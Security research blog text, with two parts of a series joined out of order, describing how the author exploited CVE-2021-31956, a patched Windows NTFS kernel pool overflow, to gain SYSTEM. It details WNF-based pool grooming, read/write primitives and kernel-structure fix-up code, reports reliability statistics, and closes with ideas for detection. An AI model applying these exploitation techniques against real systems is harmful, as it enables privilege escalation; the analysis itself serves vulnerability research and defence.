As you can see, there is a member TemporaryNamesListHead which is the head of a linked list of the addresses of the TemporaryNameListEntry within each _WNF_NAME_INSTANCE.
Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.
We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).
An example of this is:
/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset.
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{
    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr;

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}
NTOSKRNL Base Address
Whilst this isn't actually needed by the exploit, I needed to obtain the NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.
The following output shows the thread whilst in the wait state:
As there are some elements of instability and non-determinism in this exploit, an exploit testing framework was developed to determine its effectiveness across multiple runs, on multiple supported platforms, and with varying exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third party drivers installed and a noisier kernel pool, it gives some indication of whether this approach is feasible and also feeds into possible detection mechanisms.
The key variables which can be modified with this exploit are:
Spray size
Post-exploitation choices
All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).
SYSTEM shells - Number of times a SYSTEM shell was launched.
Total LFH Writes - For all 100 runs of the exploit, how many corruptions were triggered.
Avg LFH Writes - Average number of LFH overflows needed to obtain a SYSTEM shell.
Failed after 32 - How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen as a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned in groups of 32 blocks.
BSODs on exec - Number of times the exploit caused a BSOD on execution.
Unmapped Read - Number of times the relative read reaches unmapped memory (ExpWnfReadStateData). This is included in the BSODs on exec count above.
Spray Size Variation
The following statistics show runs when varying the spray size.
Spray size 3000
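| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| SYSTEM shells | 85 | 82 | 76 | 75 | 75 | 78 |
| Total LFH writes | 708 | 726 | 707 | 678 | 624 | 688 |
| Avg LFH writes | 8 | 8 | 9 | 9 | 8 | 8 |
| Failed after 32 | 1 | 3 | 2 | 1 | 1 | 2 |
| BSODs on exec | 14 | 15 | 22 | 24 | 24 | 20 |
| Unmapped Read | 4 | 5 | 8 | 6 | 10 | 7 |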
Spray size 6000
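| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| SYSTEM shells | 84 | 80 | 78 | 84 | 79 | 81 |
| Total LFH writes | 674 | 643 | 696 | 762 | 706 | 696 |
| Avg LFH writes | 8 | 8 | 9 | 9 | 8 | 8 |
| Failed after 32 | 2 | 4 | 3 | 3 | 4 | 3 |
| BSODs on exec | 14 | 16 | 19 | 13 | 17 | 16 |
| Unmapped Read | 2 | 4 | 4 | 5 | 4 | 4 |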
Spray size 10000
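| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| SYSTEM shells | 84 | 85 | 87 | 85 | 86 | 85 |
| Total LFH writes | 805 | 714 | 761 | 688 | 694 | 732 |
| Avg LFH writes | 9 | 8 | 8 | 8 | 8 | 8 |
| Failed after 32 | 3 | 5 | 3 | 3 | 3 | 3 |
| BSODs on exec | 13 | 10 | 10 | 12 | 11 | 11 |
| Unmapped Read | 1 | 0 | 1 | 1 | 0 | 1 |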
Spray size 20000
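| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| SYSTEM shells | 89 | 90 | 94 | 90 | 90 | 91 |
| Total LFH writes | 624 | 763 | 657 | 762 | 650 | 691 |
| Avg LFH writes | 7 | 8 | 7 | 8 | 7 | 7 |
| Failed after 32 | 3 | 2 | 1 | 2 | 2 | 2 |
| BSODs on exec | 8 | 8 | 5 | 8 | 8 | 7 |
| Unmapped Read | 0 | 0 | 0 | 0 | 1 | 0 |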
From this we can see that increasing the spray size greatly decreases the chance of hitting an unmapped read (due to the page not being mapped), and thus reduces the number of BSODs.
On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.
Post Exploitation Method Variation
I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that the token stealing method performs more kernel reads/writes and leaves a longer time window before PreviousMode is reverted.
20000 spray size
With all the _SEP_TOKEN_PRIVILEGES enabled:
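| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| PRIV shells | 94 | 92 | 93 | 92 | 89 | 92 |
| Total LFH writes | 939 | 825 | 825 | 788 | 724 | 820 |
| Avg LFH writes | 9 | 8 | 8 | 8 | 8 | 8 |
| Failed after 32 | 2 | 2 | 1 | 2 | 0 | 1 |
| BSODs on exec | 4 | 6 | 6 | 6 | 11 | 6 |
| Unmapped Read | 0 | 1 | 1 | 2 | 2 | 1 |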
Therefore, there is only a negligible difference between these two methods.
Detection
After all of this is there anything we have learned which could help defenders?
Well, firstly, there has been a patch out for this vulnerability since the 8th of June 2021. If you're reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on.
However, there are some engineering insights which can be gained from this and in general detecting memory corruption exploits within the wild. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc) which have been covered in many online articles. As I never had access to the in the wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.
The main artifacts from this exploit are:
NTFS Extended Attributes being created and queried.
WNF objects being created (as part of the spray)
Failed exploit attempts leading to BSODs
NTFS Extended Attributes
Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.
This can be captured as part of an ETW trace:
As this vulnerability can be exploited at low integrity (and thus from a sandbox), the detection mechanisms would vary based on whether an attacker had local code execution or chained it together with a browser exploit.
One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome did not trigger either of the events while loading a new tab and web page. I didn't explore too deeply whether there were any render operations which could trigger this non-maliciously, but this provides a place where defenders can explore further.
WNF Operations
The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.
Crash Dump Telemetry
Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.
In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur, which could act as a detection artefact:
Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution, once kernel code execution or SYSTEM has been gained, they may just disable the telemetry or sanitise it afterwards, especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:
This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.
At this point we now have an exploit which is much more successful and less likely to cause instability on the target system than a simple POC. However, we can only get about a 90% success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.
Acknowledgements
Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.
Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.
Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.
Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.
Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.
As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing modern kernel pool exploits for Windows 10 20H2 and onwards.
One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This led to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!
This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.
Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.
Vulnerability Summary
As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver's NtfsQueryEaUserEaList function:
Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.
There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.
The out_buf_length is then decremented by the size of the ea_block_size and its padding.
The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;
This is because each Ea Block should be padded to be 32-bit aligned.
Putting some example numbers into this, let's assume the following: there are two extended attributes set on the file.
At the first iteration of the loop we could have the following values:
By looking at the callers of NtfsCommonQueryEa we can see that the NtQueryEaFile system call path reaches the vulnerable code.
The documentation for the Zw version of this syscall function is here.
We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described above.
In order to trigger the underflow, we need to set our output buffer size to be the length of the first Ea Block.
Providing we are padding the allocation, the second Ea Block will be written out of bounds of the buffer when the second Ea Block is queried.
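The length accounting described above can be modelled in a few lines of portable C. This is only a sketch under stated assumptions: simulate_query and ea_padding are hypothetical names, and the order of operations (check against out_buf_length minus the previous block's padding, then decrement, then compute the new padding) is taken from the description in this post rather than from the driver itself. It shows why the underflow only occurs when the first Ea Block is not already 4-byte aligned.

```c
#include <stdint.h>

/* Padding needed to round an Ea Block up to a 32-bit boundary. */
static uint32_t ea_padding(uint32_t ea_block_size)
{
    return ((ea_block_size + 3u) & 0xFFFFFFFCu) - ea_block_size;
}

/*
 * Simplified model of the bounds check. ea_sizes holds the size of each
 * Ea Block in order. Returns how many bytes would be written past the end
 * of an output buffer of out_buf_length bytes (0 means no overflow).
 */
static uint32_t simulate_query(const uint32_t *ea_sizes, int count,
                               uint32_t out_buf_length)
{
    const uint32_t capacity = out_buf_length; /* real size of the buffer */
    uint32_t write_pos = 0;                   /* next write offset       */
    uint32_t padding = 0;                     /* padding owed from the previous block */
    uint32_t overflow = 0;

    for (int i = 0; i < count; i++) {
        uint32_t size = ea_sizes[i];

        /* The check: unsigned arithmetic, so 0 - 2 wraps to 0xFFFFFFFE. */
        if (size > out_buf_length - padding)
            break; /* block rejected, nothing more is copied */

        write_pos += padding; /* skip alignment padding */
        write_pos += size;    /* "copy" the block       */
        if (write_pos > capacity)
            overflow = write_pos - capacity;

        out_buf_length -= size + padding;
        padding = ea_padding(size);
    }
    return overflow;
}
```

With blocks of 18 and 32 bytes and an 18 byte output buffer, the second check becomes 32 <= 0 - 2 and passes, so the model reports 34 bytes written out of bounds (2 bytes of padding plus the 32 byte block). With a first block of 20 bytes and a 20 byte buffer there is no padding, the second check is 32 <= 0, and the copy is correctly rejected.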
The interesting things from this vulnerability from an attacker perspective are:
1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.
However, the question is can this be exploited reliably in the presence of modern kernel pool mitigations and is this a "good" memory corruption:
So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?
The function NtSetEaFile has the Zw version documented here.
The Buffer parameter here is "a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set".
Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.
There is then the padding length of 2, with the second extended attribute starting at 20 offset.
The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.
This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.
If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow copy of an attacker-controlled size.
So in summary, once the extended attributes have been written to the file using NtSetEaFile, it is then necessary to trigger the vulnerable code path to act on them by calling NtQueryEaFile with the output buffer size set to exactly the size of our first extended attribute.
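As a rough illustration of the buffer layout passed to NtSetEaFile, the sketch below builds a two-entry chain by hand in portable C. The helper names (ea_entry_size, put_ea, build_ea_chain) are hypothetical; the field order follows the documented FILE_FULL_EA_INFORMATION structure (NextEntryOffset, Flags, EaNameLength, EaValueLength, then the NUL-terminated name followed by the value), which is where the "+ 9" in the block size comes from (8 header bytes plus the name terminator). It assumes a little-endian host so that the raw bytes match what Windows expects.

```c
#include <stdint.h>
#include <string.h>

/* NextEntryOffset (4) + Flags (1) + EaNameLength (1) + EaValueLength (2). */
#define EA_HEADER_SIZE 8u

/* Unpadded size of one entry: name_len + value_len + 9. */
static uint32_t ea_entry_size(uint8_t name_len, uint16_t value_len)
{
    return EA_HEADER_SIZE + name_len + 1u + value_len;
}

static uint32_t align4(uint32_t n)
{
    return (n + 3u) & ~3u;
}

/* Write one entry at buf + offset and return its unpadded size. */
static uint32_t put_ea(uint8_t *buf, uint32_t offset, uint32_t next_entry_offset,
                       const char *name, const uint8_t *value, uint16_t value_len)
{
    uint8_t name_len = (uint8_t)strlen(name);
    uint8_t *p = buf + offset;

    memcpy(p, &next_entry_offset, 4);               /* NextEntryOffset     */
    p[4] = 0;                                       /* Flags               */
    p[5] = name_len;                                /* EaNameLength        */
    memcpy(p + 6, &value_len, 2);                   /* EaValueLength       */
    memcpy(p + 8, name, (size_t)name_len + 1u);     /* EaName, with NUL    */
    memcpy(p + 8 + name_len + 1, value, value_len); /* value follows name  */
    return ea_entry_size(name_len, value_len);
}

/*
 * Build the two-entry chain: the first entry sizes the vulnerable buffer,
 * the second carries the overflow data. Returns the total bytes used and
 * stores the unpadded size of the first entry in *first_size.
 */
static uint32_t build_ea_chain(uint8_t *buf,
                               const char *name1, const uint8_t *val1, uint16_t len1,
                               const char *name2, const uint8_t *val2, uint16_t len2,
                               uint32_t *first_size)
{
    uint32_t size1 = ea_entry_size((uint8_t)strlen(name1), len1);
    uint32_t second_offset = align4(size1); /* first entry plus its padding */

    memset(buf, 0, second_offset);
    put_ea(buf, 0, second_offset, name1, val1, len1); /* points at the next entry */
    uint32_t size2 = put_ea(buf, second_offset, 0, name2, val2, len2); /* 0 ends the chain */

    *first_size = size1;
    return second_offset + size2;
}
```

With a 4 character name and a 5 byte value the first entry is 18 bytes, so its NextEntryOffset is 20 and the value returned in first_size (18) is the Length to pass to NtQueryEaFile.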
Understanding the kernel pool layout on Windows 10
The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There have been significant changes with bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and proposing some initial techniques. Without this paper being published already, exploitation of this issue would have been significantly harder.
Firstly, the important thing is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine which of the four "backends" the chunk lives on:
Low Fragmentation Heap (LFH)
Variable Size Heap (VS)
Segment Allocation
Large Alloc
I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of size 0x30 allocated on the LFH as follows:
This is due to the size of the allocation being below 0x200.
We can step through the corruption of the adjacent chunk occurring by setting a conditional breakpoint on the following location:
bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'"
and then breakpointing on the memcpy location.
This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.
It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk, and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true; however, it demonstrates that even more restrictive constraints can often be worked around, and that you should always try to understand the constraints of your bug fully before jumping into exploitation.
By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:
This means that chunk size calculation will be, 0x12 + 0x10 = 0x22, with this then being rounded up to the 0x30 segment chunk size.
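The rounding can be written down as a one-line helper. This is a sketch that assumes a 0x10 byte _POOL_HEADER and a 0x10 byte bucket granularity for these small sizes; the granularity is inferred from the examples in this post (0x22 rounding up to 0x30) rather than taken from the allocator itself, and pool_chunk_size is a hypothetical name.

```c
#include <stdint.h>

#define POOL_HEADER_SIZE 0x10u /* size of the _POOL_HEADER                 */
#define POOL_GRANULARITY 0x10u /* assumed bucket step for small allocations */

/* Chunk size that a request of the given size ends up occupying. */
static uint32_t pool_chunk_size(uint32_t requested)
{
    uint32_t total = requested + POOL_HEADER_SIZE;
    return (total + POOL_GRANULARITY - 1u) & ~(POOL_GRANULARITY - 1u);
}
```

Under these assumptions pool_chunk_size(0x12) gives 0x30, a 94 byte output buffer gives 0x70, and a 0xA8 byte object gives 0xC0, which matches the chunk sizes seen elsewhere in this post.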
We can however also adjust both the size of the allocation and the amount of data we will overflow.
As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):
NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94
This ends up being allocated within a 0x70 byte chunk:
As you can see it is therefore possible to influence the size of the vulnerable chunk.
At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).
Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.
WNF Introduction
The Windows Notification Facility is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.
Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.
I don't want to duplicate the background here, so I recommend reading the following documents first to get up to speed:
Having a good grounding in the above research will allow a better understanding of how WNF related structures are used by Windows.
Controlled Paged Pool Allocation
One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.
There has been plenty of previous research into non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, then we need to find exploit primitives allocated within this pool.
Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.
I started off by looking through the primary structures associated with this feature and what could be controlled from userland.
One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:
Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.
The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:
This is useful for filling the pool with allocations of a controlled size and content, so we continue our investigation of the WNF feature.
Controlled Free
The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.
There's also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData, which in turn ends up freeing our allocation.
Whilst researching this area, I was able to reuse the freed chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists, as from empirical testing I did not seem to be hitting this after a large spray of WNF chunks.
Relative Memory Read
Now we have the ability to perform both a controlled allocation and free, but what about the data itself? Can we do anything useful with it?
Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:
The DataSize is to denote the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:
At this point there are many interesting things which can be leaked out, especially considering that both the vulnerable NTFS chunk and the WNF chunk can be positioned next to other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.
We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.
Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:
We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.
So at this point it's worth noting that the relative write has not really given us anything more than we had already with the NTFS overflow. However, as the data can be both read and written back using this technique, it opens up the ability to read data, modify certain parts of it and write it back.
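The effect of corrupting DataSize and AllocatedSize can be reproduced with a small user-mode model. This is a sketch only: the 16 byte header mirrors the public _WNF_STATE_DATA layout (Header, AllocatedSize, DataSize, ChangeStamp), but model_read, model_write and set_sizes are hypothetical helpers, the "pool" is just a byte array in which the chunks sit back to back, and pool headers, ChangeStamp handling and the reallocation path are left out.

```c
#include <stdint.h>
#include <string.h>

/* Same field order as _WNF_STATE_DATA; the data follows the header. */
typedef struct {
    uint32_t Header;
    uint32_t AllocatedSize;
    uint32_t DataSize;
    uint32_t ChangeStamp;
} wnf_state_data;

/* Hypothetical stand-in for the NTFS overflow corrupting the two size fields. */
static void set_sizes(uint8_t *chunk, uint32_t allocated, uint32_t data)
{
    wnf_state_data hdr;
    memcpy(&hdr, chunk, sizeof hdr);
    hdr.AllocatedSize = allocated;
    hdr.DataSize = data;
    memcpy(chunk, &hdr, sizeof hdr);
}

/* Read path: the only bound on the copy is the DataSize stored in the chunk.
 * Returns the number of bytes copied, or 0 if the caller's buffer is too small. */
static uint32_t model_read(const uint8_t *chunk, uint8_t *out, uint32_t out_len)
{
    wnf_state_data hdr;
    memcpy(&hdr, chunk, sizeof hdr);
    if (out_len < hdr.DataSize)
        return 0;
    memcpy(out, chunk + sizeof hdr, hdr.DataSize);
    return hdr.DataSize;
}

/* Write path: the existing allocation is reused whenever AllocatedSize is
 * large enough. Returns 1 on an in-place write, 0 where the real code would
 * allocate a new chunk instead. */
static int model_write(uint8_t *chunk, const uint8_t *in, uint32_t len)
{
    wnf_state_data hdr;
    memcpy(&hdr, chunk, sizeof hdr);
    if (hdr.AllocatedSize < len)
        return 0;
    memcpy(chunk + sizeof hdr, in, len);
    hdr.DataSize = len;
    memcpy(chunk, &hdr, sizeof hdr);
    return 1;
}
```

If a chunk that really holds 0x20 bytes of data has both size fields raised to 0x50, model_read returns bytes belonging to whatever follows it in the array and model_write overwrites them, which is the relative read and relative write described above.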
_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes
As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow. This wrong assumption led me to try to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.
Therefore my approach was to use the NTFS overflow to corrupt the BlockSize in the _POOL_HEADER of a 0x30 sized WNF chunk.
By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.
By setting the BlockSize to a different size, once the chunk is freed using our controlled free, we can force the chunk's address to be stored within the wrong lookaside list for the size.
Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.
Finally, we can then trigger corruption again and therefore corrupt our more interesting object.
Initially I demonstrated this being possible using another WNF chunk of size 0x220:
As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative writes.
Using this layout we can corrupt the PipeAttribute's Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.
Diagrammatically we end up with the following memory layout for the arbitrary read part:
Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.
The journey to arbitrary write
After taking a step back after this minor Pipe Attribute detour, and with the realisation that I could actually control the size of the vulnerable NTFS chunks, I started to investigate if it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur, the bounds checking within ExpWnfWriteStateData would be successful.
Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:
We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.
Therefore we can end up with our desired memory layout with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:
I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address, as this was used within the in-the-wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and this could also be exploited at low integrity.
There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.
StateName Corruption
For a successful StateName lookup, the internal state name needs to match the external name queried from.
At this stage it is worth going into the StateName lookup process in more depth.
The key thing to realise here is that whilst Version, LifeTime, DataScope and Sequence are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.
As you can see from the below, based on the DataScope, the current server Silo Globals or the Server Silo Globals are offset into to obtain v10, and this is then used as the Sequence, which is incremented by 1 each time.
i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.
Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.
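To make the relationship between the external and internal StateName more concrete, here is a minimal sketch of the conversion and field decoding. The XOR constant and the bit layout (Version: 4 bits, NameLifetime: 2, DataScope: 4, PermanentData: 1, Sequence: 53) are taken from the public WNF research recommended earlier, not from this post, and should be treated as assumptions to verify against the target build; all function and type names are hypothetical.

```c
#include <stdint.h>

/* XOR key between external and internal state names (from public WNF research). */
#define WNF_STATE_KEY 0x41C64E6DA3BC0074ULL

typedef struct {
    uint32_t version;        /* 4 bits  */
    uint32_t lifetime;       /* 2 bits, 3 = WnfTemporaryStateName */
    uint32_t data_scope;     /* 4 bits  */
    uint32_t permanent_data; /* 1 bit   */
    uint64_t sequence;       /* 53 bits */
} wnf_name_fields;

static uint64_t wnf_external_to_internal(uint64_t external)
{
    return external ^ WNF_STATE_KEY;
}

static uint64_t wnf_internal_to_external(uint64_t internal)
{
    return internal ^ WNF_STATE_KEY;
}

/* Pack the fields into an internal state name. */
static uint64_t wnf_encode_internal(wnf_name_fields f)
{
    return ((uint64_t)(f.version & 0xFu))
         | ((uint64_t)(f.lifetime & 0x3u) << 4)
         | ((uint64_t)(f.data_scope & 0xFu) << 6)
         | ((uint64_t)(f.permanent_data & 0x1u) << 10)
         | (f.sequence << 11);
}

/* Split an internal state name back into its fields. */
static wnf_name_fields wnf_decode_internal(uint64_t internal)
{
    wnf_name_fields f;
    f.version        = (uint32_t)(internal & 0xFu);
    f.lifetime       = (uint32_t)((internal >> 4) & 0x3u);
    f.data_scope     = (uint32_t)((internal >> 6) & 0xFu);
    f.permanent_data = (uint32_t)((internal >> 10) & 0x1u);
    f.sequence       = internal >> 11;
    return f;
}
```

Because the Sequence for temporary names comes from a global counter, names created back to back during a spray should differ only in the Sequence bits, which is what makes guessing the adjacent object's StateName practical.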
One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateNames of the objects which have been heap sprayed, you don't necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.
However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure's StateName to be.
